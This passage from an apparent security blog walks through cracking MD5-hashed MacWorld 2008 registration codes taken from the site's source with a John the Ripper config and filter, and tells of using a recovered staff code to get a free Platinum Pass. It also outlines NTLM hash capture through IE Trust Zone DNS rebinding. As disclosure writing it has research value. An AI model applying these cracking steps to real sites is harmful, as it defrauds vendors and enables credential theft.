cracks-per-second</a>. Until that code is released or we write our own, we have to work with clusters of machines to reach that. My little cluster of 9 nodes can do just about 60 million MD5's a second so a full 8 character run would take nearly 2 months to complete.<br /><br />Now that you know the math and the big mountain ahead of us, how can we get on the gondola that takes you over half of it without much effort? The answer is simple, vendor codes and keyword masking!<br /><br /><insert badge="" picture=""><span style="font-style: italic; font-weight: bold;">Here Come The Free Codes:</span><br /><br />Vendors receive a group of codes each to pass along to their customers, potential customers, friends, family, etc. These typically provide free Expo access but maybe they'll help trim down this mountain to something manageable. These free codes get passed around like candy so finding one takes a few <a href="http://www.google.com/search?q=macworld+priority+code">Google searches</a>. 08-G-PC189, 08-G-PC178, 08-G-PC260,</insert> do you see the pattern?<insert badge="" picture=""><br /><br /><span style="font-style: italic; font-weight: bold;">Time To Build An External Filter:</span><br /><br />Now that we have a mask (08-x-y(n)) time to modify the john.conf accordingly:</insert><br /><blockquote style="font-family: courier new;"><div class="code" style="border: 1px dotted rgb(160, 160, 160); margin: 0pt; padding: 0pt; overflow: auto; white-space: nowrap; background-color: rgb(240, 240, 240); color: rgb(0, 0, 187); width: 100%;font-family:'Courier New',Courier,monospace;"><span class="br0">[</span>Incremental:MW<span class="br0">]</span><br />File = $JOHN/lanman.<span class="me1">chr</span><br />MinLen = <span class="nu0">6</span><br />MaxLen = <span class="nu0">6</span><br />CharCount = <span class="nu0">69</span><br /><span class="br0"><br />[</span>List.<span class="me1">External</span>:MW<span class="br0">]</span><br />void filter<span class="br0">(</span><span class="br0">)</span><br /><span class="br0">{</span><br /> int i, c;<br /> i = <span class="nu0">0</span>;<br /><br /> while <span class="br0">(</span>c = word<span class="br0">[</span>i<span class="br0">]</span><span class="br0">)</span> <span class="br0">{</span><br /> <span class="co1"> // If character is lower case, convert to upper</span><br /> if <span class="br0">(</span>c >= <span class="st0">'a'</span> && c <= <span class="st0">'z'</span><span class="br0">)</span><br /> word<span class="br0">[</span>i<span class="br0">]</span> &= 0xDF;<br /> i++;<br /> <span class="br0"> }</span><br /><br /> <span class="co1"> // We know the static filter 08-?-?????</span><br /> <span class="co1"> // Add or remove word[]s to fit the incremental length</span><br /> word<span class="br0">[</span><span class="nu0">9</span><span class="br0">]</span> = word<span class="br0">[</span><span class="nu0">5</span><span class="br0">]</span>;<br /> word<span class="br0">[</span><span class="nu0">8</span><span class="br0">]</span> = word<span class="br0">[</span><span class="nu0">4</span><span class="br0">]</span>;<br /> word<span class="br0">[</span><span class="nu0">7</span><span class="br0">]</span> = word<span class="br0">[</span><span class="nu0">3</span><span class="br0">]</span>;<br /> word<span class="br0">[</span><span class="nu0">6</span><span class="br0">]</span> = word<span class="br0">[</span><span class="nu0">2</span><span class="br0">]</span>;<br /> word<span class="br0">[</span><span class="nu0">5</span><span class="br0">]</span> = word<span class="br0">[</span><span class="nu0">1</span><span class="br0">]</span>;<br /> word<span class="br0">[</span><span class="nu0">4</span><span class="br0">]</span> = <span class="st0">'-'</span>;<br /> word<span class="br0">[</span><span class="nu0">3</span><span class="br0">]</span> = word<span class="br0">[</span><span class="nu0">0</span><span class="br0">]</span>;<br /> word<span class="br0">[</span><span class="nu0">2</span><span class="br0">]</span> = <span class="st0">'-'</span>;<br /> word<span class="br0">[</span><span class="nu0">1</span><span class="br0">]</span> = <span class="st0">'8'</span>;<br /> word<span class="br0">[</span><span class="nu0">0</span><span class="br0">]</span> = <span class="st0">'0'</span>;<br />}<br /></div></blockquote> With that, we run and wait...<br /><blockquote style="font-family: courier new;"><span style="font-family:courier new;"># john -i=MW -e=MW mw2k8.codes --format=raw-MD5</span><br /><span style="font-family:courier new;">Loaded 1341 password hashes with no different salts (Raw MD5 [raw-md5 SSE2])</span><br /></blockquote>.. but not too long because the first code looks REALLY interesting: 08-S-STAFF. Lets try it!<br /><br /><embed style="width:640px; height:480px;" id="VideoPlayback" type="application/x-shockwave-flash" src="http://video.google.com/googleplayer.swf?docId=-5737431513580266985&hl=en" flashvars=""> </embed><br />Download the <a href="http://grutz.jingojango.net/MacWorld2K8/MacWorld2K8.mov">High Quality</a> version.<br /><br />Voila. For the second year in a row, a free Platinum Pass in less than a day.<br /><br />On January 7th we noticed the MD5 hashes changed in the source code. While the special code was still listed it no longer gave a 100% discount when entered. Some codes still provide a small percentage discount and a few do provide a free expo pass. We still have 14 codes left to crack so no telling if those are any good. :)<br /><br />Thanks to <a href="mailto:bernsteinj%20%5B%5Bat%5D%5D%20gmail.com">Josh Bernstein</a> and <a href="http://ggee.org/">Garrett Gee</a> for reminding me MacWorld was coming up and independently confirming these findings.<br /><br />Maybe next year the problem will be fixed? Anyone in a betting mood? :)<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com8tag:blogger.com,1999:blog-28687371.post-61234277132192649842007-11-15T07:00:00.000-08:002007-11-15T07:45:20.224-08:00IE Trust ZonesThis week is the joint OWASP/WASC conference in San Jose. Two days of web app nerds getting together and exchanging ideas about CSRF protections, web services, the Samy worm, etc. It's loads of fun! I'm a big OWASP supporter and push their information wherever possible. I'm always shocked when I hear "I've never heard of them" from a developer.<br /><br />Rsnake gave a presentation/rant about the sorry state of web security. Not that it's something that was created out of malice, just that we're seeing issues today that were never part of the original concept of the web. Just like spam was never on the minds of Ray and Dick when they <a href="http://openmap.bbn.com/%7Etomlinso/ray/firstemailframe.html">created electronic mail</a>.<br /><br />He briefly mentioned one of my favorite topics - Windows hashes. Then I read his blog entry describing Natron's ideas <cite></cite>for <a href="http://ha.ckers.org/blog/20071112/effects-of-dns-rebinding-on-ies-trust-zones/">using DNS Pinning to affect the IE Trust Zone.</a> It's an area I was thinking of but hadn't worked on yet because I was focused on the insider attack space. Awesome!<br /><br />Of course there are a few complications with the theory that have to be considered:<br /><ol><li>If the attacker doesn't send the domain name in the Type message that the victim's computer is a member of, a dialog box will appear. People may still put their passwords in but the idea of mass transparent authentication capture isn't there.</li><li>IE Trust Zones are pretty akward in design. What constitutes an Intranet Zone site? Microsoft <a href="http://support.microsoft.com/kb/174360">KB174360</a> says: <span style="font-style: italic;"> By default, the Local Intranet zone contains all of the network connections that were established by using a Universal Naming Convention (UNC) path, and Web sites that bypass the proxy server or have names that do not include periods (for example, http://local), provided that they are not assigned to either the Restricted Sites or Trusted Sites zone.</span></li><li>If a company is using a proxy server and you DNS Pin a name that doesn't have a FQDN at the end, that address may never be reached because IE won't use the defined proxy and attempt to connect directly to the attacker's IP address.</li></ol>Another option I was thinking of would be somehow creating a Java or Flash proxy server but unfortunately their sandboxes have locked down any bind requests (unless someone has some mojo that gets around this). Flash doesn't support it and Java doesn't permit binds in applets.<br /><br />In any event the patch to Metasploit adding NTLM type message parsing was submitted back in October. I have some updates to send in but it's still functional. The pre-defined nonce hash catcher (pokehashball.rb) script is fairly complete and the HTTP-to-POP3 tool (psyduck-pop3.rb) is fun to play with. None of these attacks have been incorporated into Metasploit modules yet but that's still on the radar (smb_relay via HTTP).<br /><br />Visit <a href="http://grutz.jingojango.net/exploits/pokehashball.html">http://grutz.jingojango.net/exploits/pokehashball.html</a> for the code.<br /><br />Full Disclosure: This attack was first documented by <a href="http://www.isecpartners.com/documents/NTLM_Unsafe.pdf">Jesse Burns at iSec Partners</a> using jCIFS. Where's your code, Jesse? :)<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-39505473963109567402007-10-26T07:46:00.000-07:002007-10-26T07:51:14.641-07:00Announcing BerkSec<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://grutz.jingojango.net/berksec/berksec-1007.gif"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px;" src="http://grutz.jingojango.net/berksec/berksec-1007.gif" alt="" border="0" /></a>Continuing the tradition of (NY|Chi|Bay|*)Sec groupings of infosec people without a vendor bent, announcing <a href="http://grutz.jingojango.net/berksec/">BERKSEC 0001</a> - just because, why not, it's not in SF.<br /><br />Come on by the Albatross Pub on Tuesday, Oct 30 at 7:30 or 8pm or later... Look for the long haired guy with a Toorcon t-shirt and join us.<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0